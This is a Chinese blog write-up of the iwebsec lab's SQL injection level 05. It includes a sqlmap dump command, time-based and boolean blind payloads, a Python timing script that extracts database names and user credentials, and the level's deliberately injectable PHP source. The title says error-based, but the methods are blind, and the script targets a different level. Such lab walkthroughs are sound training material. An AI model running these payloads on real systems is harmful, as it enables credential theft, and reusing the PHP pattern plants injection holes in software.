首页 > 数据库 >iwebsec-sql注入 05 报错型注入

iwebsec-sql注入 05 报错型注入

时间:2023-08-18 19:25:38浏览次数:42  
标签:head mid echo sleep 报错 iwebsec payload 注入

01、题目分析:

三大盲注中的报错型注入,

image

02、sqlmap工具注入:

一把梭

python .\sqlmap.py -u "http://www.bdrwmy.cn:8001/sqli/05.php?id=1"  --current-db --dump --batch

image

03、手工注入:

盲注,简单的来讲就是无论你输入什么内容,页面都不会出现错误提示,如果查询结果正确就显示类似查询成功或者其他的,错误就不会显示。所以注入思路其实就是一个个猜,比如数据库名的长度是6个吗,看看是否正确,没显示继续猜,正确就猜数据库名第一个字母是a吗,是b吗......这样一直猜,猜出来数据库名,表名,列名,数据等等

众所周知时间注入比布尔注入耗时更久,因为布尔判断是否正确能快速回显,而时间判断是否正确只能通过页面的加载时间慢了几秒,所以也只提供思路

-- 延迟:
and sleep(1);
and if(1>2,sleep(1),0);
and if(1<2,sleep(1),0);

-- 布尔:
-- 检查数据库名称的长度是否为7
and length(database())=7;
-- 检查数据库名称是否以字母 'p' 开头
and left(database(),1)='p';
-- 检查数据库名称是否以字母 'pi' 开头
and left(database(),2)='pi';
-- 检查数据库名称中的第一个字符是否为 'p'
and substr(database(),1,1)='p';
-- 检查数据库名称中的第二个字符是否为 'i'
and substr(database(),2,1)='i';
-- 检查数据库名称的第一个字符的 ASCII 码是否为 112 ('p' 的 ASCII 码)
and ord(left(database(),1))=112;

04、手工脚本注入:

这个地方直接借用refeng大佬的脚本

暴力破解法:

# @Author:refeng
import requests

url = "http://www.bdrwmy.cn:8001/sqli/04.php?id=1  and "

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #爆库
        # payload = f"1=if(ascii(substr((select  database() ),{i},1))>{mid},sleep(2),1) --+"
        #爆表
        # payload = f"1=if(ascii(substr((select  group_concat(table_name) from information_schema.tables where table_schema='iwebsec' ),{i},1))>{mid},sleep(2),1) --+"
        #爆列
        # payload = f"1=if(ascii(substr((select  group_concat(column_name) from information_schema.columns where table_name='user' ),{i},1))>{mid},sleep(2),1) --+"
        #爆数据
        payload = f"1=if(ascii(substr((select  group_concat(concat_ws('~',username,password)) from iwebsec.user ),{i},1))>{mid},sleep(2),1) --+"
        try:
            r = requests.get(url + payload, timeout=0.5)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

05、代码分析:

<?php

  require_once('../header.php'); // 包含页眉文件
  require_once('db.php'); // 包含数据库连接文件
  ?>
<html>
	<head>
		<title>MySQL updatexml SQLi</title>
	</head>
	<h2>MySQL updatexml SQLi</h2>
		<div class="alert alert-success">
			<p>/index.php?id=1 </p> <!-- 提示用户可以通过访问带有'id'参数的URL来执行代码 -->
		</div>
	<body>
  <?php
  if(isset($_GET['id'])){ // 检查请求中是否设置了'id'参数
	$id=$_GET['id'];
	
	$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1"; // 构建查询语句,获取指定id的用户信息
		$result=mysql_query($sql); // 执行查询并存储结果
	}
	else{
		exit(); // 如果没有设置'id'参数,则退出脚本
	}
	if ($result) { // 如果查询成功
		?>
		<table class='table table-striped'> <!-- 创建表格来显示查询结果 -->
      <tr><th>id</th><th>name</th><th>age</th></tr> <!-- 表头 -->
		<?php
		while ($row = mysql_fetch_assoc($result)) { // 遍历结果集中的每一行
			echo "<tr>"; // 开始一个新的表行
    			echo "<td>".$row['id']."</td>"; // 显示'id'列的值
    			echo "<td>".$row['username']."</td>"; // 显示'username'列的值
    			echo "<td>".$row['password']."</td>"; // 显示'password'列的值
			echo "</tr>"; // 结束表行
		}	
		echo "</table>"; // 结束表格
	}
	else 
	{
//	echo '<font color= "#FFFFFF">';
	print_r(mysql_error()); // 显示查询执行过程中的任何错误
//	echo "</font>";  
	}
  require_once '../footer.php'; // 包含页脚文件
?>

标签:head,mid,echo,sleep,报错,iwebsec,payload,注入
From: https://www.cnblogs.com/bdrwmy/p/17641405.html

相关文章

  • iwebsec-sql注入 06 宽字节字符型注入
    01、题目分析宽字节字符型注入,因为源代码中传参get值的时候,有一个addslashes()函数,是返回在预定义字符('")之前添加反斜杠的字符串。也就是说,当我们按照正常的字符型注入的时候,会在'前加入,也就是说,我们在url上--url写入?id=1'orderby3--+--在addslashes(1'order......
  • burpsuite靶场----SQL注入16----DNS外带test
    burpsuite靶场----SQL注入16----oracle之DNS外带test靶场地址https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band正式开始1.先在burpsuite自带的dns上获取一段url2.使用payload'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+enc......
  • iwebsec-sql注入 07 空格过滤
    01、题目分析空格过滤就是将用户输入的空格过滤掉,众所周知,sql注入语句中会有很多的sql注入语句,如果进行了空格过滤,那么sql注入语句会因为参数连接在一快导致不能正常注入02、手工注入既然是数字型注入,那么对sql注入语句中的空格用其他内容替换即可,可以使用/**/、()、%0a等等,我这......
  • iwebsec-sql注入 03 bool型注入
    01、题目分析:三大盲注型注入中的布尔型注入,说明只会回显正确结果,错误结果将不再回显,对于布尔型注入,手工注入会费时费力,因此布尔注入比较适合工具注入02、sqlmap工具注入:一把梭python.\sqlmap.py-u"http://www.bdrwmy.cn:8001/sqli/03.php?id=1"--current-db--dump--ba......
  • iwebsec-sql注入 04 时间延迟型注入
    01、题目分析:三大盲注中的时间型注入,当查询语句正常的时候,不会有什么返回值或者回显,唯一的特征就是可以通过sleep函数来判断sql语句是否正确,也就是说,当有办法能判断输入语句是否正确的时候,步骤就和bool盲注一样了,话不多说,直接先让我们伟大的sqlmap跑起来02、sqlmap工具注入:一......
  • burpsuite靶场----SQL注入15----oracle的时间盲注
    burpsuite靶场----SQL注入15----oracle的时间盲注靶场地址https://portswigger.net/web-security/sql-injection/blind/lab-time-delays-info-retrieval正式开始这个和之前的oracle的布尔盲注差不多https://www.cnblogs.com/thebeastofwar/p/17640741.html稍微改一下脚本,因......
  • iwebsec-sql注入 02 字符型注入
    01、题目分析正常来讲的字符型的sql注入,sql语句如下select * from news where id='$id';像这种就可以在注入的传参后面加上一个单引号,然后联合sql语句最后加上注释符--+就行,但是这个网站不行,因为在这个靶场的字符型注入的中的源代码,加入了宽字节过滤,所以正常的字符型注......
  • npm加参数--host启动报错 Could not auto-determine entry point from rollupOptions
    参考:https://blog.csdn.net/qq_41664096/article/details/118961381使用以下命令启动npm只能本机访问npmrundev如果需要网络访问则需要加参数--hostnpmrundev--host0.0.0.0会报错(!)Couldnotauto-determineentrypointfromrollupOptionsorhtmlfilesandt......
  • iwebsec-sql注入 01 数字型注入
    01、题目分析数字型注入的sql语句select * from news where id=$id;最最最常规的,直接注入02、手工注入:先判断有多少列http://www.bdrwmy.cn:8001/sqli/01.php?id=1orderby3--id=-1就是不显示内容http://www.bdrwmy.cn:8001/sqli/01.php?id=-1unionselect1,2,......
  • burpsuite靶场----SQL注入13----oracle的CAST报错注入
    burpsuite靶场----SQL注入13----oracle的CAST报错注入靶场地址https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based正式开始1.通过在TrackingId=JBhlRizkqfo87Hq8后面添加'和''(两个单引号)猜测是oracle数据库添加'报错,添加''......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99